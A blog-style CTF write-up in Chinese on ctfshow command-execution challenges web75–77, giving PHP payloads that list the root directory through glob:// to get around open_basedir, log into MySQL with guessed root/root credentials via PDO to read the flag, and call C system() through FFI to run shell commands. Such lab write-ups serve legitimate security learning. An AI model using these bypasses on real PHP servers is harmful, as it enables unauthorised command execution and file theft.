ctfshow web入门 命令执行web75-77

最近几天在刷ctfshow的web入门命令执行部分的练习题，学到了不少新姿势，简单记录一下自己对于最后几道题解题思路的理解

web75

由于存在open_basedir配置的限制，无法使用scandir函数列出目录信息，可以使用glob协议绕过open_basedir的限制，在根目录发现flag36.txt文件。

c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
	echo($f->__toString().' ');
}exit();

本题还通过include_path限制了文件包含的路径，无法直接使用include包含得到flag信息，于是尝试使用uaf的方式绕过命令执行的限制，但是由于本题过滤了strlen，我也尝试了使用几种方法重写strlen函数，但是都没有执行成功，后续如果重写成功后会及时更新，因此参照提示信息使用PDO连接MySQL数据库的方式读取flag信息，payload如下。

$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select database()");
foreach($rs as $row){
        echo($row[0])."|"; 
}exit();

视频讲解中提到能够获取数据库名为ctftraining，但是我尝试使用蚁剑连接过滤不严格的题目环境，在登录mysql时始终出现段错误的情况，但是即便不知道数据库名为ctftraining，也可以通过连接默认数据库information_schema达到命令执行的目录，只需要猜解出mysql的用户名和密码即可。

通过连接默认数据库information_schema查询数据库名，发现确实存在名为ctftraining的数据库。

$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select group_concat(SCHEMA_NAME) from SCHEMATA");
foreach($rs as $row){
        echo($row[0])."|"; 
}exit();

使用load_file函数读取flag文件即可获取flag信息

web77

这道题仍然首先利用glob协议绕过open_basedir的限制，列出根目录下的所有文件，发现有两个可疑的文件，分别是flag36x.txt和readflag

c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
	echo($f->__toString().' ');
}exit();

尝试沿用web75和76的思路，使用PDO连接MySQL数据库，然后使用load_file函数绕过文件读取的限制，读取flag，但是报 could not find driver的错误，表明此题无法使用PDO连接数据库。
查看writeup，此题利用的是PHP 7.4+的FFI特性，即外部函数接口特性，相关文档请查看PHP手册，这里我主要是对payload信息进行简单分析。

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//没有回显的
$ffi->system($a);//通过$ffi去调用system函数

PHP手册中对FFI:cdef原型的描述为public static FFI::cdef(string $code = "", ?string $lib = null)，其中$code为一个字符串，包含常规C语言中的一系列声明，$lib为要加载和链接的共享库文件名称，如果省略lib，则平台将会尝试在全局范围内查找代码中声明的符号，其他系统将无法解析这些符号。
起初我认为payload中第一行代码的含义是，在不提供$lib信息的情况下，则会默认调用PHP中的system函数，但是实际上int system(const char *command);即为C语言中system函数的定义，用于执行系统命令，也即在Linux平台下将/readflag > 1.txt使用shell进行解析并执行，因此猜测readflag可能是一个可执行文件。

• 使用FFI调用C语言中的system函数列出根目录

c=$ffi = FFI::cdef("int system(const char *command);");
$a='ls / > 1.txt';
$ffi->system($a);exit();

• 尝试直接读取/flag36x.txt，访问1.txt后没有任何内容

c=$ffi = FFI::cdef("int system(const char *command);");
$a='cat /flag36x.txt > 1.txt';
$ffi->system($a);exit();

• 尝试读取/readflag文件，成功读取，为ELF可执行文件

c=$ffi = FFI::cdef("int system(const char *command);");
$a='cat /readflag > 1.txt';
$ffi->system($a);exit();

• 猜测/flag36x.txt文件无法读取的原因为权限不足，列出根目录的文件权限信息，发现该文件对于其他用户并没有读的权限，而我们执行命令的用户为www-data，因此无法直接使用cat读取文件内容。

c=$ffi = FFI::cdef("int system(const char *command);");
$a='ls -lst / > 1.txt';
$ffi->system($a);exit();

• 使用IDA查看/readflag可执行文件的内容，证实了之间的猜测
  
  通过执行readflag文件即可获取flag信息